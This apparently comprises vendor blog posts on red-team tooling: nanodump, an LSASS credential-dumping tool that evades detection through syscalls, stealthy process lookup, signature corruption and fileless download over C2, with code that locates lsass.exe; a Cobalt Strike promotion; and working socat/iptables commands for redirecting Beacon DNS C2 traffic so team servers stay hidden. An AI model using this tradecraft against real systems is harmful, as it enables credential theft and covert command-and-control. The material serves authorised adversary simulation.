Successful security testing involves both talented cybersecurity professionals and the right portfolio of tools. Solutions that work with one another can help to maximize resources, reduce console fatigue, and standardize reporting. Tools like Core Impact can help serve as a point of centralization, helping organizations to advance their vulnerability management programs without overcomplicating strategies.

Nanodump: A Red Team Approach to Minidumps

 

Motivation

Dumping Windows credentials is a technique often utilized by adversaries and, consequently, Red Teamers. The technique has been around for many years and is well documented by MITRE as T1003.001. Sometimes, when conducting a Red Team engagement, there may be some limitations when trying to go beyond the early detection of this technique, to allow defenders to train against complex manipulation and usage of the credentials.

One of the options to overcome this limitation is to explicitly allow the execution of this technique. However, there is another way, which is both stealthier and more lightweight. The following article will dive into how it can be executed. 

Introduction 

ReactOS is an interesting and valuable project for anyone interested in understanding the low-level code of a Windows-like OS. We started with the path of least resistance, but found that trying to compile minidump.c from ReactOS was quite difficult. However, after carefully analyzing the minidump module from skelsec, we found the information we needed about the minidump file format.

The minidump format is quite complex and has many structures, pointers, and sections. In order to keep things as simple as possible, we experimented with the minidump python module to remove and change several parts in order to understand if these were relevant. 

Streams 

A minidump is composed of multiple “streams” which are like sections that contain specific information. For example, ExceptionStream presumably contains information like the stack trace in case the minidump was created due to a crash. 

After testing with pypykatz we found that the only relevant streams were SystemInfoStream, ModuleListStream, and Memory64ListStream. This first finding simplified the process because limiting the number of streams reduced the processing that needed to be done. 

SystemInfoStream 

This stream has information about the Windows machine, and it is not related to LSASS itself. It has relevant information such as the Windows version and build number, but also less relevant fields such as the number of processors. 

We ended up setting all the fields that were not needed to NULL. This made the process of creating the minidump a lot simpler, as we were able to ignore irrelevant fields. 

ModuleListStream 

All of the DLLs LSASS loaded are listed in this stream. It is worth noting that, while this stream is important, for this exercise, it wasn’t necessary to include every single DLL.  

In fact, we were able to ignore most of them and kept only those that are relevant to mimikatz, such as kerberos.dll and wdigest.dll. This decision effectively made the size of the dump a lot smaller. 

Memory64ListStream 

The actual memory pages of the LSASS process can be found in this stream. However, it takes up a lot of space, so reducing its size was critical to reduce the overall dump size. We decided to ignore any page that met any of the following conditions: 

  • Page wasn’t committed 
  • Page marked as mapped 
  • Page protection equals PAGE_NOACCESS 
  • Page marked as PAGE_GUARD 

Ignoring all these pages did not break the analysis of mimikatz, but did effectively reduce the size of the dump. 

Final Size 

By taking out all the non-vital information from the dump we managed to reduce the dump from roughly 50MB down to 10MB. 

Obfuscation 

As explained earlier, another goal was to achieve some level of obfuscation. Given that the creation of the minidump is done programmatically, we had full control of the dump and thus could implement any obfuscation that we chose. 

We opted to corrupt the “magic bytes” (or signature) of the minidump file format, which is a simple, yet effective approach.  

Minidumps start with the signature bytes “MDMP” (the multi-byte constant “PMDM”, 0x504D444D, stored little-endian). Changing these magic bytes makes it more difficult to figure out if a block of memory is a minidump, and since this is at the very start of the file, the binary blob wouldn’t look like a minidump, not even at creation time.

This modification did break mimikatz and pypykatz. We created a small bash post-dump script to restore the original format once the dump is on the tester’s machine. 
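
nanodump ships this restore step as a bash script; purely as an illustration of what it does, an equivalent in C might look like the following (hypothetical code, not part of nanodump):

#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>

int main(int argc, char** argv)
{
    if (argc != 2) { printf("usage: restore_signature <dump.bin>\n"); return 1; }

    FILE* file = fopen(argv[1], "r+b");
    if (!file) return 1;

    // A valid minidump begins with the bytes 'M','D','M','P'; nanodump
    // corrupts them at creation time, so we simply write them back in place.
    const unsigned char signature[4] = { 'M', 'D', 'M', 'P' };
    fwrite(signature, 1, sizeof(signature), file);
    fclose(file);
    return 0;
}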

PID of LSASS 

To dump LSASS, you typically need to know the PID of the LSASS process. The action of listing all the running processes could be seen as an abnormal or suspicious activity. Running tasklist or even calling CreateToolhelp32Snapshot might be detected by advanced security solutions.

We decided to use the NtGetNextProcess syscall to loop over all the processes in the system until we found a process that had ‘lsass.exe’ loaded. This was a valid method to find the LSASS process and avoided having to go through the usual steps. 
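
A sketch of that loop (our own illustration; the prototype for the undocumented NtGetNextProcess follows public research, and the image-name check here uses a Win32 helper purely for brevity, whereas nanodump resolves everything via syscalls):

#include <windows.h>
#include <psapi.h> // GetProcessImageFileNameA; link against Psapi.lib
#include <string.h>

typedef LONG(NTAPI* NtGetNextProcess_t)(HANDLE ProcessHandle, ACCESS_MASK DesiredAccess,
    ULONG HandleAttributes, ULONG Flags, PHANDLE NewProcessHandle);

// Walk every process handle we can obtain until the image name matches lsass.exe.
HANDLE FindLsass(NtGetNextProcess_t NtGetNextProcess)
{
    HANDLE hProcess = NULL; // NULL means "start from the first process"
    while (NtGetNextProcess(hProcess, MAXIMUM_ALLOWED, 0, 0, &hProcess) == 0)
    {
        CHAR path[MAX_PATH] = { 0 };
        if (GetProcessImageFileNameA(hProcess, path, MAX_PATH) &&
            strstr(path, "lsass.exe") != NULL)
            return hProcess;
    }
    return NULL;
}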

Avoiding API calls 

Reducing the number of API calls was important for obvious reasons: userland hooks. The only Windows API call that nanodump calls is LookupPrivilegeValueW, which is used to enable SeDebugPrivilege. This privilege should already be enabled in most cases, but feel free to remove this call if you want to be even stealthier. Besides that, everything is done using syscalls to avoid userland hooks. 

Syscalls Support 

To use syscalls, we used SysWhispers2, so there is no need to re-compile nanodump for every new version of Windows. We had to make a few changes to the code to avoid using global variables, given that Beacon Object Files (BOF) do not support them. We also used InlineWhispers to build nanodump on Linux using MinGW.

Fileless download 

We also wanted to have the possibility of downloading the dump using Beacon’s C2 channel without touching the disk. However, it can be written to a file if need be. 

No Beacon? No Problem 

As explained earlier, we initially started this project as part of our Red Team practice, allowing us to conduct complex threat actions. Sometimes we don’t need to go as far as deploying Beacon on each compromised machine, so we added the possibility to use the .EXE version of nanodump. The one limitation that exists for the EXE version is that you cannot use the fileless download feature, given that it relies on Cobalt Strike’s C2 channel for it. 

Conclusion 

While creating a syscall-based minidump was challenging, it was also critical for many scenarios. Additionally, creating a malleable module capable of feeding the great mimikatz is a powerful and flexible approach. The idea of modularizing a software solution has been around for many years, and in this context it is even more important for improving the tool’s success and future updates in the face of strong and dynamic detection tools.
 

Do it Yourself 

If you’re interested in using nanodump, we’ve posted the code to our GitHub.

Credits 

Thanks to: 

  • Skelsec for his amazing work with minidump and pypykatz. 
  • freefirex from CS-Situational-Awareness-BOF at TrustedSec for many cool tricks for BOFs.
  • jthuraisamy for SysWhispers2 

How to Extend Your Reach with Cobalt Strike 

 

We’re often asked, “what does Cobalt Strike do?” In simple terms, Cobalt Strike is a post-exploitation framework for adversary simulations and Red Teaming to help measure your security operations program and incident response capabilities. Cobalt Strike provides a post-exploitation agent, Beacon, and covert channels to emulate a quiet long-term embedded actor in a network.  

If we as security testers and red teamers continue to test in the same ways during each engagement, our audience (i.e., the defensive side) will not get much value out of the exercises. It’s important to be nimble. Cobalt Strike provides substantial flexibility for users to change their behavior and adapt just as an adversary does. For example, Malleable C2 is a Command and Control language that lets you modify memory and network indicators to control how Beacon looks and feels on a network.  

Cobalt Strike was designed to be multiplayer. One of its foundational features is its ability to support multiple users accessing multiple servers and sharing sessions. Enabling participation from users with different styles and skillsets further varies behavior to enrich engagements.

While there are also numerous built-in capabilities, one of which we’ll discuss below, they are limited to what the team adds to the tool. One of our favorite features of Cobalt Strike is its user developed modules, through which many of the built-in limits are overcome. In fact, users are encouraged to extend its capabilities with complementary tools and scripts to tailor the engagements to best meet the organization’s needs. We wanted to highlight a few ways we’ve recently seen Cobalt Strike users doing just that to conduct effective assessments.   

Interoperability with Core Impact 

Contrary to many perceptions, Cobalt Strike is actually not a penetration testing tool. As we mentioned earlier, we identify as a tool for post-exploitation adversary simulations and Red Team operations. However, we have recently begun offering interoperability with Core Impact, which is a penetration testing tool with features that align well with those of Cobalt Strike.  

Core Impact is typically used for exploitation and lateral movement and validating the attack paths often associated with a penetration test. Used by both in-house teams as well as third-party services, Core Impact offers capabilities for remote, local, and client-side exploitation. Impact also uses post-exploitation agents, which, while they don’t have a cool name like “Beacon,” are versatile in both their deployment and capabilities, including chaining and pivoting.   

While a previous blog dives deeper into the particulars, to quickly summarize, the interoperability piece comes in the form of session passing between both platforms. Those with both tools can deploy Beacon from within Core Impact. Additionally, users can spawn an Impact agent from within Cobalt Strike. If you have Cobalt Strike and would like to learn more, we recommend requesting a trial of Core Impact to try it out. 

Integration with Outflank’s RedELK Tool 

RedELK is an open-source tool that has been described by its creators as a “Red Team’s SIEM.” This highly usable tool tracks and sends Red Teams alerts about the activities of a Blue Team by creating a centralized hub for all traffic logs from redirectors to be sent and enriched.  Gaining visibility into the Blue Team’s movements enables Red Teams to make judicious choices about their next steps. These insights help Red Teams create a better learning experience and ensure Blue Teams get the most out of their engagements. 

Additionally, it also centralizes and enriches all operational logs from teamservers in order to provide a searchable history of the operation, which could be particularly helpful for longer and larger engagements. This all sounds like an ideal integration for Cobalt Strike users, right? While the sub-header is a fairly large spoiler, it is nonetheless very exciting that RedELK does fully support the Cobalt Strike framework.  

Community Kit Extensions  

We can’t say enough good things about the user community. So many of you have written first-rate tools and scripts that have further escalated the power of Cobalt Strike – we feel like an artist’s muse and the art the community creates is amazing. However, many of these extensions are tricky to find, so not everyone has had the opportunity to take advantage and learn from them. In order to highlight all of this hard work, we’ve created the Community Kit. This central repository showcases projects from the user community to ensure that they’re more easily discovered by fellow security professionals.

We encourage you to check it out to see the fantastic work of your peers, which can help raise the level of your next security engagement and may even inspire you to create and submit your own. Check back regularly as new submissions are coming in frequently.

A Dynamic Framework  

Cobalt Strike was intentionally built as an adaptable framework so that users could continually change their behavior in an engagement. However, this flexibility has also enabled both expected and unexpected growth of the tool itself. Planned additions like the interoperability with Core Impact allows users to benefit from session passing, while unanticipated extensions like those in the community kit are equally welcome, as they enable users to truly make the tool their own. Ultimately, we’re excited to see such dedication to this tool from all angles, as it motivates us all to keep advancing Cobalt Strike to the next level so users can keep increasing the value of every engagement.   

Want to learn more about Core Impact? 

Get information on other ways Core Impact and Cobalt Strike complement one another for comprehensive infrastructure protection. 

Simple DNS Redirectors for Cobalt Strike

 

This post, from Ernesto Alvarez Capandeguy of Core Security’s CoreLabs Research Team, describes techniques used for creating UDP redirectors for protecting Cobalt Strike team servers. Redirectors are one of the recommended mechanisms for hiding Cobalt Strike team servers: when using the HTTP channel, they add different points which a Beacon can contact for instructions.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. There is a very delimited set of data that clearly defines what constitutes a network connection (or flow). The state is explicit and can be easily determined from the packet stream. There are several generic proxies (e.g. SOCAT) that can simply proxy TCP connections in user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).

The situation is radically different for UDP. This is due to a few factors:

  • UDP is packet oriented, while TCP is byte/connection oriented.
  • UDP is stateless and keeping track of UDP “connections” requires second guessing the “connection” state.
  • UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. This connection can transmit EOF messages, so the proxy would always be aware of the state of the connection and would unambiguously know when it should release the connection resources.

UDP is more challenging, since without a way of directly sensing the DNS transaction state, SOCAT cannot know when to release the connection resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in a way that the team server has to send the response back to the redirector, which will relay it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping from a network port. Anyone can do it using netcat or an equivalent tool. Anyone with experience with any of these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector also has these problems, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump into the solution, we should try to see the problems. Let’s attempt a naive approach to a DNS channel redirector. We can execute a straight SOCAT, and launch a Beacon pointed to our redirector, which will be executing the following:

# socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

# tcpdump -l -n -s 5655 -i eth0  udp port 53
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
 
05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never got the idea that the first transaction was over and is still waiting for data from the same source port, ignoring all the others.

This can easily be solved by telling SOCAT to fork for every packet it sees. Below we show our second attempt at doing a SOCAT redirector:

# socat udp4-listen:53,fork udp4:teamserver.example.net:53
 
# tcpdump -l -n -s 5655 -i eth0  udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let’s inspect the process table:

# ps 
  PID TTY          TIME CMD
5365 pts/0    00:00:00 sudo
5366 pts/0    00:00:00 bash
5864 pts/0    00:00:00 socat
5865 pts/0    00:00:00 socat
5866 pts/0    00:00:00 socat
5867 pts/0    00:00:00 socat
5868 pts/0    00:00:00 socat
5869 pts/0    00:00:00 socat
5870 pts/0    00:00:00 socat
5871 pts/0    00:00:00 socat
5883 pts/0    00:00:00 socat
5886 pts/0    00:00:00 socat
5888 pts/0    00:00:00 socat
5889 pts/0    00:00:00 socat
5890 pts/0    00:00:00 socat
5891 pts/0    00:00:00 socat
5903 pts/0    00:00:00 socat
5904 pts/0    00:00:00 socat
5908 pts/0    00:00:00 socat
5910 pts/0    00:00:00 socat
5911 pts/0    00:00:00 socat
5912 pts/0    00:00:00 socat
5913 pts/0    00:00:00 socat
5914 pts/0    00:00:00 socat
5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let’s stress the redirector a bit by requesting a few screenshots and then check the process table:

# ps | grep socat | wc -l
3489

If we weren’t root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

socat udp4-listen:53,fork udp4:teamserver.example.net:53
2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem is that SOCAT does not notice when a transaction has ended, and so keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involved in UDP proxying, we can build a functional solution. The trick is to tell SOCAT to drop each connection as soon as its transaction is complete. A five-second inactivity timeout should do the job:

# socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.
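A quick way to verify the redirector end to end is to query it directly; dig works fine for this, using the hostname and test domain from the capture above:

# Send a test query through the redirector
dig @redirector.example.net 7242b4ba.cobalt-domain.hlmnet.net A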

While five seconds is a reasonable default timeout, we can try to optimize this value. To fine-tune the timeout, we should understand the problem we’re facing: a DNS request is sent to our redirector, which relays it to the team server. Once the team server answers, the transaction is over.

This ties our timeout to something we can measure: the round-trip time between the redirector and the team server, plus the time needed to process the request. A reasonable value is twice the RTT between the hosts, which leaves some safety margin. Since our test hosts are on the same LAN, a timeout of one second is more than enough for our example.
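As a sketch of that tuning process: measure the RTT first, then set the timeout to roughly twice the observed value. SOCAT’s -T option takes a timeval, so fractional seconds should work (the 0.5 below is just a placeholder; substitute your own measurement):

# Measure the round-trip time to the team server
ping -c 5 teamserver.example.net

# Set the inactivity timeout to roughly twice the observed RTT
socat -T 0.5 udp4-listen:53,fork udp4:teamserver.example.net:53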

Below we show the process usage for five-second and one-second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout caps the number of active processes at a plateau whose height depends on the activity level and the timeout value.
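To reproduce a measurement like this, a simple sampling loop is enough; this sketch just counts SOCAT processes once per second (redirect the output to a file if you want to plot it):

# Count running SOCAT processes once per second
while true; do ps -C socat -o pid= | wc -l; sleep 1; done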

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT to translate UDP to TCP: for every UDP packet received, we fork and open a new TCP connection, sending the DNS data over it. It is very important not to recycle connections, because UDP is packet-oriented while TCP is a stream; if we put more than one packet into a single TCP connection, two packets might be joined together or one might be split apart. In theory, SOCAT could also split a DNS request into two UDP packets, but this does not happen in practice. Be aware, though, that this risk always exists when translating UDP to TCP.

We tell SOCAT to take traffic from port 53 and, for each packet, open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low considering that TCP is involved:

# socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we’re encapsulating our data within TCP, we also need to run the following on the team server to unwrap the traffic back to UDP:

# socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let’s now try generating some traffic and see what happens.

In the resulting graph, the dip in the middle represents a lapse in activity; the quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP holds a connection in a wait state (TIME_WAIT) after it is closed from the client side. This wait is needed in case some control messages are lost, and must not be removed for the protocol to operate properly. It is not a problem, though, because the number of allocated resources reaches an equilibrium: a few RTTs after the activity goes down, the resource usage drops as well.

Once we have this translation capability, we can put it to use. With DNS carried over TCP, we can leverage other proxying utilities, such as stunnel or SSH’s port forwarding, to hide the team server from public scrutiny. The team server can then be kept in an isolated network, without ever being exposed to the Internet.
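As a sketch of that idea, the redirector can open an SSH tunnel to the team server and point its SOCAT at the local end of the tunnel, so the team server never listens on a public interface (the account name here is hypothetical):

# Forward local port 9191 to the team server's loopback over SSH
ssh -f -N -L 9191:127.0.0.1:9191 operator@teamserver.example.net

# Point the UDP-to-TCP SOCAT at the local tunnel endpoint instead
socat -T 1 udp4-listen:53,fork tcp4:127.0.0.1:9191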

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to answer the Beacon directly. That response will be ignored, as it arrives from a different DNS server than the one the query was sent to.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel’s NAT system automatically keeps track of connection state, even for UDP traffic. The tracking is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they’re lightning fast, incredibly efficient, and robust. Unlike SOCAT redirectors, however, an IPTABLES redirector cannot convert one protocol to another, because IPTABLES works by mangling packets rather than proxying connections.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone, the packet will be diverted without changing its source address. As we already explained, this is not a good result, so we also need a SNAT operation.

The decision to apply this double NAT must be made before either operation takes place, because the DNAT performed by the PREROUTING rule erases important information from the packet (namely, whether it was addressed to the redirector in the first place).

To execute both operations on the same packet, we use the MARK target in the PREROUTING chain, matching the packet on every parameter of interest. Once the packet is marked, rules in both the PREROUTING and POSTROUTING chains can act on it, letting us rewrite the packet completely.

One final detail is that IP forwarding must be enabled on the redirector, since all of these operations count as forwarding, even when the packet leaves through the same interface it came in on.

In the end, there are four commands that need to be called:

# Enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

# Mark incoming DNS packets with the tag 0x400
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp \
    --destination my.ip.address --destination-port 53 -j MARK --set-mark 0x400

# For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp \
    -j DNAT --to-destination teamserver.example.net:53
iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE
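These settings do not survive a reboot on their own. If persistence is needed, something along these lines should work, though the exact file locations vary by distribution (the paths below follow the Debian/Ubuntu convention):

# Keep IP forwarding enabled across reboots
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf

# Save the NAT rules so they can be restored at boot
iptables-save > /etc/iptables/rules.v4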

Evaluating the defaults exposed in the proc filesystem, we see that the translation table holds 65,536 entries (/proc/sys/net/netfilter/nf_conntrack_max) spread over 16,384 hash buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, lookups should be quick. These are default values and can easily be changed by writing a new number to the file, if necessary.
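For example, if a deployment ever approaches the table limit, raising it is a one-liner (the value below simply doubles the default):

# Double the conntrack table size
echo 131072 > /proc/sys/net/netfilter/nf_conntrack_max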

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.

To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.
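A convenient way to watch this value in real time:

# Sample the number of active NAT entries once per second
watch -n 1 cat /proc/sys/net/netfilter/nf_conntrack_count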

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above, we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15-second intervals, fewer than 10 conntrack slots are used. When we switch to no delay, the value quickly grows to about 500, depending on the available throughput. When heavy activity is requested, the number of connection states rises steadily to 2,500 and plateaus at about 2,700. Once activity ceases, the tracked connections decay over roughly 90 seconds, at which point they have all expired and the value stabilizes below 10.

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages, they are ultimately all very usable.

The IPTABLES-based redirector is the quickest and has the smallest footprint: it is included in the kernel by default and needs just four commands.

The SOCAT-based redirectors are similar to one another, the main difference being whether traffic is converted to TCP or not. The UDP redirector is simpler, but the TCP variant shines in special cases: TCP connections are easier to encapsulate, for example when the traffic must be tunneled via SSH.

            Resource usage   Speed   Versatility   Ease of Use   Stability
SOCAT TCP   0                0       ++            +             0
SOCAT UDP   +                +       +             ++            +
IPTABLES    ++               ++      0             ++            ++